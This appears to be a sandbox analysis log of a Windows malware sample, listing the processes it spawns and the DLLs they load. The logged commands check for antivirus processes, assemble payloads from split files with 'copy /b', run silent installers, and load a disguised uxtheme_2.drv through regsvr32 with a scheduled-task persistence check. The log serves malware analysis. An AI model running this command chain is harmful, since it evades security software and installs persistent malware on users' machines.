                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 36469
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Geographic
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "TEAMS" Mw
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 36469\Avoiding.com + Hood + Centered + Collectors + Visual + Additionally + Celebration + Flesh + Ventures + Waters 36469\Avoiding.com
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Characterized + ..\Entries + ..\Arbitration + ..\Put + ..\Comics + ..\Japanese L
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Avoiding.com L
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe "C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe"
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe "C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe"
                            Source: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp "C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp" /SL5="$E0074,1104885,161792,C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe"
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpProcess created: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe "C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe" /VERYSILENT
                            Source: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp "C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp" /SL5="$30490,1104885,161792,C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe" /VERYSILENT
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv"
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeProcess created: C:\Windows\System32\regsvr32.exe /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv"
                            Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exe "C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exe"
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeProcess created: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe "C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeProcess created: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe "C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe "C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe "C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe "C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe "C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe "C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exe "C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E GeographicJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1061683001\infinity.exeProcess created: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp "C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp" /SL5="$C0024,3499155,56832,C:\Users\user\AppData\Local\Temp\1061683001\infinity.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpProcess created: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe "C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe" -iJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 36469
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Geographic
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "TEAMS" Mw
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 36469\Avoiding.com + Hood + Centered + Collectors + Visual + Additionally + Celebration + Flesh + Ventures + Waters 36469\Avoiding.com
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Characterized + ..\Entries + ..\Arbitration + ..\Put + ..\Comics + ..\Japanese L
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Avoiding.com L
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                            Source: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp "C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp" /SL5="$E0074,1104885,161792,C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe"
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpProcess created: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe "C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe" /VERYSILENT
                            Source: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp "C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp" /SL5="$30490,1104885,161792,C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe" /VERYSILENT
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv"
                            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv"
                            Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
                            Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comProcess created: unknown unknown
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: webio.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: rstrtmgr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: mstask.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: dui70.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: duser.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: chartv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: oleacc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: atlthunk.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: textinputframework.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: coreuicomponents.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: wtsapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: winsta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: textshaping.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: explorerframe.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
